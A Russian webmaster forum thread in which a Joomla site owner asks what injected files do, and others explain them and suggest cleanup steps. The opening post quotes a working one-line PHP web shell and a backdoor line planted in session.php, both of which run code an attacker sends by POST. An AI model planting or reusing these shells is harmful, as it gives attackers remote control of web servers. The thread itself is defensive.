Форум Сайтостроение Безопасность

Чем грозит вирус?

[Удален]
1183

Добрый день.

Похоже откопали уязвимость на сайте (Joomla), сказывается следующим образом:

в произвольной папке сайта появляется файлик с названием cache.uniq_ххххх.php, где xxxxx какое-то число. Содержимое самого файла 

<?php if(isset($_POST["php"])){@eval(stripslashes($_POST["php"]));};?>

Одновременно с этим в файл session.php по пути \public_html\libraries\joomla\session

в самое начала добавляются строки 

if(isset($_POST["php_code"])){@$_POST["php_func"](stripslashes($_POST["php_code"]));};



if(isset($_SERVER["HTTP_USER_AGENT"])){$_SERVER["HTTP_USER_AGENT"]=@preg_replace("/[^\w\-\.]+/is","_",$_SERVER["HTTP_USER_AGENT"]);}



if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])){$_SERVER["HTTP_X_FORWARDED_FOR"]=@preg_replace("/[^\d\.]+/is","",$_SERVER["HTTP_X_FORWARDED_FOR"]);}

Пока чищу ручками, не смейтесь, ибо дыра не найдена. Но хотелось бы понять, что эта зараза делает.

Оптимизайка
На сайте с 11.03.2012
Offline
396
Оптимизайка
#1

Это шелл, выполняет любые команды задавыемые злоумышленником при удаленном обращении к этому файлу (от имени пользователя веб-сервера).

⭐ BotGuard (https://botguard.net) ⭐ — защита вашего сайта от вредоносных ботов, воровства контента, клонирования, спама и хакерских атак!
Maxim-KL
На сайте с 26.01.2011
Offline
350
Maxim-KL
#2

Sergsap, Пройдитесь по сайту Ai-Bolitом это будет в разы быстрее чем руками да и руками не все найдете.

Мои услуги по прогонам: ✅Качественный ручной статейный прогон по базе сайтов с ИКС10+ (maximgroups.net/progon-statejnyj) ✅Прогон Максимум - Все включено, 300+ качественных ссылок (maximgroups.net/progon-maksimum)
[Удален]
#3

Спасибо за помощь. Айболит сообщил про дыру как раз в этом файле. Ну и плюс еще много пищи для размышлений на досуге подкинул :).

Maxim-KL
На сайте с 26.01.2011
Offline
350
Maxim-KL
#4

Sergsap, Скорее всего это бекдор в этом файле, а не дыра. Так что юзайте внимательней...

[Удален]
#5

Да, это я неправильно выразился в силу незнания подобных терминов.

Айболит сообщил об уязвимости в этом скрипте и еще в одном. С первым просто, ибо проблема широкая, со вторым не очевидно для меня по крайней мере.

Речь о строчке 

eval($form->ScriptDisplay);

в administrator/components/com_rsform/helpers/rsform.php

Тут обсуждают проблему, дальше есть проверялки на уязвимость, проверил сайт, вроде пишут норм.

Еще Айболит выдал предупреждения на несколько скриптов с "iframe", вот думаю как их вырезать, чтобы лишнего не оттяпать). Одна такая вставка 

<iframe

			src="<?php echo JURI::base(); ?>index.php?option=com_akeeba&view=log&task=iframe&layout=raw&tag=<?php echo urlencode($this->tag); ?>"

			width="99%" height="400px">

		</iframe>
Срочно нужна Ваша помощь! Личный блог, wordpress, уникальный Перешёл на светлую сторону
Maxim-KL
На сайте с 26.01.2011
Offline
350
Maxim-KL
#6
Sergsap:
чтобы лишнего не оттяпать)

Если оттяпаете, всегда можно вернуть)) Ищите уязвимость в CMS, шаблоне, модулях. Обновите их всех до последних версий.

Mutabors
На сайте с 17.09.2012
Offline
127
Mutabors
#7

Sergsap, не нужно удалять ни первый ни второй кусок кода.

Это не вредоносный код, а часть рабочего кода, которая и была изначально написана разработчиками соответствующих дополнений.

Враги спрятались в другом месте! :-)

Самый продвинутый и надежный SSD хостинг рунета с изоляцией сайтов по 115 руб! (http://beget.ru/?id=332651) Контекстная реклама и продажи. Конкурентные и серые темы. Дорого! Не трать время на рутину! Ее сделают за копейки! (http://www.work-zilla.com?ref=143498)
[Удален]
#8

Ну не знаю, как только удалил, все стало нормально :). Значит не такой уж и нужный рабочий код :)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий